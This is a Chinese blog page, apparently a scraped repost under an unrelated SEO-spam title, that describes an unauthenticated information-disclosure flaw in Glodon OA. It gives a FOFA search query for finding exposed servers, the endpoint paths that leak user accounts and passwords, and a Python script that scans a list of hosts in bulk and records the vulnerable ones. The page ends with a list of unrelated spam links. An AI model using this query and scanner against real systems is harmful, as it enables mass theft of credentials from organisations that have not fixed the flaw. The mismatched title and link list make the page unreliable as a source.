当前位置: 首页 > news >正文

用r语言 做网站点击热力图百度推广授权代理商

用r语言 做网站点击热力图,百度推广授权代理商,wordpress分类栏目文章,保定seo企业网站漏洞描述 广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑,提供一百余款基于“端云大数据”产品/服务,提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞,由于某些接口没有鉴权&#xff0c…

漏洞描述

广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑,提供一百余款基于“端+云+大数据”产品/服务,提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞,由于某些接口没有鉴权,导致未经身份认证的远程攻击者可以利用该接口输出用户的账号密码。

漏洞复现

FOFA

app="Glodon-企业管理产品"

POC

IP+/Org/service/Service.asmx查看所有用户
/Org/service/Service.asmx/GetUserXml4GEPS
查看账户密码
/Org/service/Service.asmx/GetUserXml4GEPS

查看账户密码

python脚本

import argparse  
import time  
import requests  
from urllib.parse import urlsplit  
import warnings  
from urllib3.exceptions import InsecureRequestWarning  color_red = '\033[91m'  
color_green = '\033[92m'  
color_blue = '\033[94m'  
color_reset = '\033[0m'  def get_url(file):  with open(file, 'r', encoding='utf-8') as f:  for url in f:  url = url.replace('\n', '')  if "http" not in url:  url = "http://" + url  parsed_url = urlsplit(url)  base_url = parsed_url.scheme + "://" + parsed_url.netloc  send_req(base_url)  def write_result(content):  with open("result.txt", "a", encoding="UTF-8") as f:  f.write('{}\n'.format(content))  warnings.filterwarnings("ignore", category=InsecureRequestWarning)  def send_req(url_check):  url = url_check + '/Org/service/Service.asmx/GetAllUsersXml'  header = {  "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",  'Connection': 'close'  }  try:  response = requests.get(url=url, headers=header, verify=False, timeout=3)  if response.status_code == 200 and "<?xml" in response.text and "UserId=" in response.text and "SUserId=" in response.text and "Code=" in response.text:  response = requests.get(url=url_check + '/Org/service/Service.asmx/GetUserXml4GEPS', headers=header, verify=False, timeout=3)  if response.status_code == 200:  result2 = f"{url_check}/Org/service/Service.asmx/GetUserXml4GEPS"  print(color_red + result2 + color_reset)  # Added color_reset to avoid colored text issues  write_result(result2)  time.sleep(1)  except Exception as e:  pass  if __name__ == '__main__':  parser = argparse.ArgumentParser()  parser.add_argument("-f", "--file", help="URL地址文件")  args = parser.parse_args()  if args.file:  get_url(args.file)  else:  print("使用-f加url文件地址")

执行效果

http://www.15wanjia.com/news/12224.html

相关文章:

  • 招聘网站怎么做营销sem和seo是什么职业
  • 设计接单app平台有哪些东莞关键词排名seo
  • 网站广告怎么赚钱全球外贸采购网
  • 网站建设收费情况怎么做一个自己的网站
  • 品牌网站建设优化公司好用的seo软件
  • 网站木马诊断百度热门关键词排名
  • 企业网站建设费用做管理费用吗百度地图推广怎么收费标准
  • 网站建设遇到哪些问题刷粉网站推广便宜
  • 做网站一般都是那些人 会做如何制作网站二维码
  • 长沙网站建设费用百度推广后台登录入口官网
  • 郑州网站开发公司哪家好百度搜索如何去广告
  • 设计公司的网站建设站点搜索
  • 农机公司网站建设南宁整合推广公司
  • 朋友圈推广怎么做上海排名优化推广工具
  • 佛山新网站建设流程网络营销主要做些什么
  • 什么是网站开发公司电话营销型网站的类型有哪些
  • 龙华公司排名轻松seo 网站推广
  • wordpress主题html5宁波seo教程app推广
  • php在线做网站郑州seo服务公司
  • vue做网站首页优化设计方法
  • 登陆网站怎么做国内看不到的中文新闻网站
  • 济南建站公司注意事项产品推广找哪家公司
  • h5类型的网站是怎么做的网络营销方法有几种类型
  • 网站开发使用哪些开发语言百度seo排名工具
  • 自己怎么做网站网站空间租用
  • 天水今日头条新闻广州seo工作
  • 淘宝自己网站怎么建设网站搜索引擎优化工具
  • 网站一条龙服务关键词优化好
  • 网站前端建设都需要什么问题专业黑帽seo
  • 无线播放电视的浏览器泰州seo外包